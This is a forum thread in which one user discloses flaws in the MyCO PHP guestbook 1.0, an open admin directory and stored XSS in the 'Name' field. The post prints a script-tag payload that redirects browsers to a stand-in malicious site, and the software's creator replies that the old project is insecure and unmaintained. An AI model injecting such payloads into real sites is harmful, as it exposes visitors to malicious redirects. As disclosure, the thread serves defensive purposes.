Likes Likes:  0
Resultaten 1 tot 2 van de 2
Geen
  1. #1
    revnic@gmail.com
    MyCO multiple vulnerabilities
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    MyCO multiple vulnerabilities

    MyCO multiple vulnerabilities

    Software:
    MyCO guestbook 1.0
    www.punctweb.com

    Credit:
    Revnic Vasile
    revnic@gmail.com

    Description:
    MyCO is a PHP guestbook that uses a MySQL database

    Vulnerability:
    the /admin directory is accessible by everyone.

    XSS can be injected into the field "Name" when registering a new user.
    <script>document.location = 'http://some.site/crash_ie.asp';</script>
    when viewing members list can redirect user's browser to a malicious site.

  2. #2
    office@punctweb.com
    MyCO multiple vulnerabilities
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: MyCO multiple vulnerabilities

    Hello.

    I foud this post by mistake (google search). I'm the creator of MyCO Guestbook, an i have some mentions to make: this project is a very old one, it is not under development for about 3 years now. It was made in a hurry, with lots of laks in code structure
    and security bugs. I do not recomend online use of it ! It is not offered anymore to the online community. If the download is found on any other websites but www.punctweb.com it is not my responsability.

    Thankyou for your understanding and please excuse my english (i'm not a very good english speaking guy).

    With respect,
    punctweb.com

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics